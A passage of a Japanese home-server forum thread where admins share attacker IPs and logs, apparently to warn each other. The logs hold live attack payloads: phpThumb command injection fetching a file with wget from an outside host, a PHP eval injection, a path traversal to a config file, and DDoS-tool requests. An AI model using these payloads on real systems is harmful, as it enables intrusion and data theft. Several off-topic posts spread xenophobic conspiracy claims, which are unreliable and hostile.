フワちゃん

アタックNo1してきたIPを晒すスレ

自宅サーバ

レス数: 204

ホーム » 自宅サーバ » アタックNo1してきたIPを晒すスレ
概要: 126.26.247.186
No.101名無しさん
#
126.26.247.186
No.102名無しさん
#
sdcドメインはクズ。
No.103名無しさん
#
79.143.179.235 - - [02/Nov/2011:23:49:33 +0900] "GET /webdav/sprint.php?act=phptools&host=66.135.60.226&time=90&port=29465 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:17:19 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=49648 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:21:27 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=51349 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:45:24 +0900] "GET /webdav/sprint.php?act=phptools&host=66.246.127.81&time=90&port=80 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:52:05 +0900] "GET /webdav/sprint.php?act=phptools&host=81.229.44.61&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:00:03 +0900] "GET /webdav/sprint.php?act=phptools&host=90.230.138.205&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:09:07 +0900] "GET /webdav/sprint.php?act=phptools&host=83.226.50.111&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
こんなふうにパラメータ変えてアタックしてくる。
もう1週間くらい同じIPからのアタックが続いてるよ、逆引きすると
backup01.xsltel.me
No.104名無しさん
#
?(??? ) ?
No.105名無しさん
#
>103
特定できてるなら、ブロックすりゃ済む話だろ...
No.106名無しさん
#
このスレはそのアタックNo1してきたURIやら状況を書いて
みんなに参考にしてもらうための情報共有スレなんですけどね
No.107名無しさん
#
>>105

スレタイ嫁ks
No.108名無しさん
#
# grep 222.229.65.227 auth.log|head -2
Nov 27 20:27:38 あああ sshd[9857]: Did not receive identification string from 222.229.65.227
Nov 27 20:31:55 あああ sshd[10280]: Failed password for invalid user root from 222.229.65.227 port 35862 ssh2
# grep 222.229.65.227 auth.log|tail -1
Nov 27 21:05:45 あああ sshd[15613]: Failed password for invalid user root from 222.229.65.227 port 43733 ssh2
# grep 222.229.65.227 auth.log|wc
1846 25606 185870
# host iacp-gw.kochi-tech.ac.jp
iacp-gw.kochi-tech.ac.jp has address 222.229.65.227
管理者がんがれ〜。
No.109名無しさん
#
アタック25
No.110名無しさん
#
2002の「アルゼンチンvsイングランド」と「決勝」を朝鮮総連を騙し、観戦した少頭劣一族のアミ…立て籠り犯 朝鮮総連 少頭劣一族の真の最終目的は 徳川の財産を全て奪い
日本の芸能人を多数 中国へ拉致し、
あちらで更に監禁し働かせ
自分達家族は優雅に国に土地を買い
自分達の国にし遊んで暮らすつもりだった。
日本の芸能人を色々な奴隷にすると言っていた。日本列島は棄てる。
中国へ帰る家族のみが立て籠り犯だ。
次に狙うのはイタリアだったらしい。
おまぬ〜!
フィリピンの范蘭と西太后の所からモンゴルに逃げた『シバ』の子達だ。
No.111名無しさん
#
同一プロバイダから昨日と今日で3回アタックしてきやがった
114.51.19.152
No.112名無しさん
#
今、まともなサーバーは Googleのみ。
確認するべき。
Googleで
インターネットテレビ 朝鮮総連 少頭劣一族 自民党 立て籠 人質(又はハッキング)
を検索して 各方面に連絡お願い致します。
インターネットテレビ 自分の本名 8桁の生年月日
で自分の犯罪も分かるかも。
掟破りのコピペ犯は私です。
犯罪解決の為に 朝鮮人と華喃 少頭劣一族=蔗冽一族と日本中…更にGoogleで御覧の世界中の方々に閲覧して頂いております。
2チャンも私が貼る場所は閲覧して頂いております。
人質は 世界中の国のトップと国連とFreemason 全メンバーですから…日本中愚か者ばかりで嘆かわしい限り。
No.113名無しさん
#
韓国人の俺が記念カキコ
No.114名無しさん
#
毎日同一人物だと思われるksからアタックされ続けている
94.23.45.14 - - [20/Dec/2011:11:31:26 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.35.108 - - [20/Dec/2011:12:06:05 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:13:58:33 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:16:50:56 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
184.173.248.10 - - [20/Dec/2011:18:32:53 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:19:52:26 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.163.199 - - [20/Dec/2011:21:46:59 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
207.109.164.19 - - [20/Dec/2011:22:12:50 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:23:43:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.185.197 - - [21/Dec/2011:12:19:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:14:58:07 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:16:51:15 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:18:47:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:20:44:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
50.19.21.165 - - [21/Dec/2011:21:33:18 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
1.115.18.174 - - [21/Dec/2011:22:37:54 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
No.115名無しさん
#
国籍調べたらどうもフランスらしいけど、フランスの糞餓鬼かな コロスぞ ゴラァ
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tm
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wge
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.7
No.116名無しさん
#
>>115

whois情報だとdedicated serverって書いてあるから、
レンタルサーバか何かだろう。
あとphpThumb()と呼ばれるツールの脆弱性を突いて、
サーバ上でコマンドを実行しようとしているところから
すると、おそらく対象のサーバは乗っ取られんではないかな。
No.117名無しさん
#
IPアドレス 175.105.126.4
ホスト名 4.126.105.175.ap.yournet.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 大阪府
IPひろば検索ランキング 17位 (48Point)
No.118名無しさん
#
安藤優子、木村太郎は、某プロパイダの社外取締役、かつ、安藤は、フジ社外の人間にもかかわらず、フジテレビジョンのM&Aの最中、フジのホワイトナ
イトの【親会社】の本業を無視して、「インターネットは虚業だ。具体性がない
。」というようなことをコメントしました。この虚業は、livedoorを指していた
としても、「同業者」であったということは、非常に、違和感を感じずには、い
られません。
No.119名無しさん
#
78.46.89.6 (liventura-grid.com)
2012/01/08,09:41:21,"-",GET,"/muieblackcat","","1.1",403,3075,"-","","-"
2012/01/08,09:41:22,"-",GET,"//index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:23,"-",GET,"//admin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/pma/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:25,"-",GET,"//db/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:26,"-",GET,"//dbadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:27,"-",GET,"//myadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:28,"-",GET,"//mysql/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:29,"-",GET,"//mysqladmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:30,"-",GET,"//typo3/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:31,"-",GET,"//phpadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:32,"-",GET,"//phpMyAdmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin1/index.php","","1.1",403,3075,"-","","-"
以下pma関係を主に百数十回
No.120名無しさん
#
>>119

セキュリティホールを突いてくるなんてどこのどいつだよ、
と思ったらドイツだった。
No.121名無しさん
#
久しぶりに来た
184.105.65.228 guardlayer.com - 2012-02-24 10:06:04 GET /muieblackcat HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //db/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //dbadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //myadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //mysql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //mysqladmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //typo3/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //xampp/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //websql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin-2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.3/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.5.1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.4/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.7/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:16 GET //phpMyAdmin-2.5.7-pl1/index.php HTTP/1.1 404 385 - -
No.122名無しさん
#
>>121

うちでも13時と20時頃に同じのが来てるわ
No.123名無しさん
#
175.194.234.79 - - [26/Feb/2012:14:10:46 +0900] "R\xb7\x95\xda\x87\x9c\xffX\xa1\xb8\x9d\x04g\x9d\xc0\x9c\x96\xde\x1e\xdd\x18\xf6\\\"\x07\xb1\xed\xcb\xe4\xfbT\xa1\xf3\xe8\x82\x9c\x16@\xfe\x1b\xf3+\xb1" 501 335 "-" "-"
なにこれ怖い
韓国(´・д・`)ヤダ
No.124名無しさん
#
Googleから大量アクセスの一部
検索用botとはまた違うみたいだ
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Blackberry8520/5.0.0.822 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (Series40; NokiaC3-00/03.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.10.15
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - SAMSUNG-GT-C3200/1.0 NetFront/3.5 Profile/M IDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Opera/9.50 (J2ME/MIDP; Opera Mini/4.0.8462/8; U; en)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - SoftBank/1.0/920SH/SHJ001 Browser/NetFront/3.4 Profile/MIDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - KDDI-CA3A UP.Browser/6.2.0.13.2 (GUI) MMP/2.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - DoCoMo/2.0 P906i(c100;TB;W24H15)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
No.125名無しさん
#
70.62.198.26
rrcs-70-62-198-26.central.biz.rr.com
しつこい
No.126名無しさん
#
荒らしやめろ
ip:218.218.181.166
host:KYNfb-02p1-166.ppp11.odn.ad.jp
UA:Opera/9.80 (Windows NT 6.0; U; ja) Presto/2.10.229 Version/11.61
No.127名無しさん
#
>126
国内なら相手ISPにログ付きで苦情を送れ。大抵それで方がつく。
No.128名無しさん
#
甘いところだと注意しただけで大して変わらないこともあるけどね
厳しいところは一発で回線停止されるけど
odnはどうだったかな…
No.129名無しさん
#
"217.36.211.177""2012-03-23 00:57:42""ETCSERVER01""""""""""AUTH=EFAIL:TYPE=LOGIN""" "0""host217-36-211-177.in-addr.btopenworld.com"
8000行あった。数秒おきに 16時間・・・
No.130名無しさん
#
64.27.15.56 アメリカunassigned.calpop.com
メール鯖にアタックしてくる
No.131名無しさん
#
116.126.87.154 韓国
[Sat May 12 00:47:09 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :81/phpmyadmin/scripts/setup.php HTTP/1.1
他137種類のattack
???
No.132名無しさん
#
日本国内からのポートスキャン、クラックツール実行
49.252.168.148
EM49-252-168-148.pool.e-mobile.ne.jp.
No.133名無しさん
#
217.41.19.142
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Disconnected (no auth attempts): rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
No.134名無しさん
#
[error] [client 65.74.155.211] File does not exist: /var/www/html/translators.html
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpmyadmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpMyAdmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/pma
[error] [client 65.74.155.211] File does not exist: /var/www/html/mysql
No.135名無しさん
#
日本国内からくる奴は、OCNが多いが理由があるのだろうか?
No.136名無しさん
#
ユーザ数
No.137名無しさん
#
YokozunaNETという謎のISPからDDOS食らった
No.138名無しさん
#
モンゴルかw
No.139名無しさん
#
ポート22に侵入しようとしてくる
www23111u.sakura.ne.jp
www3079uh.sakura.ne.jp
www7183ue.sakura.ne.jp
www18135ue.sakura.ne.jp
No.140名無しさん
#
ssh(dd_ssh)攻撃
1.33.202.193
el-labo-s1.el-labo.jp
No.141名無しさん
#
このスレまだあるんだね。
ssh対策なら、denyhosts動かしておけば自動収集してくれるのに。
purge_deny=1yにしておいたら、こんなに収集してくれたよ。
% egrep ^sshd /etc/hosts.deny | wc -l
968
No.142名無しさん
#
218.67.246.197 [2012.8/07-18:53:47 +0900] "POST /index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D HTTP/1.1" 404 REF:-
No.143名無しさん
#
>>141

こいつ馬鹿だわ
期間も書かずに、こんなにとか言ってるし
No.144名無しさん
#
夏だねぇ。
purge_deny=1y
の意味ぐらい調べてから書けば良いのに。
No.145名無しさん
#
そういう意味じゃないと思われ
夏だな、電波野郎しかいないのか
No.146名無しさん
#
2012/08/21,03:07:39,122.154.101.54,"","-","-",GET,"/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php","module_name=../../../../../../../..//etc/amportal.conf","1.1",403,1041,"-","","-"
No.147名無しさん
#
1年でpurgeするのだから、1年分の収集だろうが... ヤレヤレ。
No.148名無しさん
#
203.91.121.70
毎日一万回以上うちのサーバーにssh総当たりしてくる
何か怖い
No.149名無しさん
#
>>148

そう思ってる奴は他にもいる
ttp://ip-address-lookup-v4.com/ip/203.91.121.70

このカテゴリの過去スレッド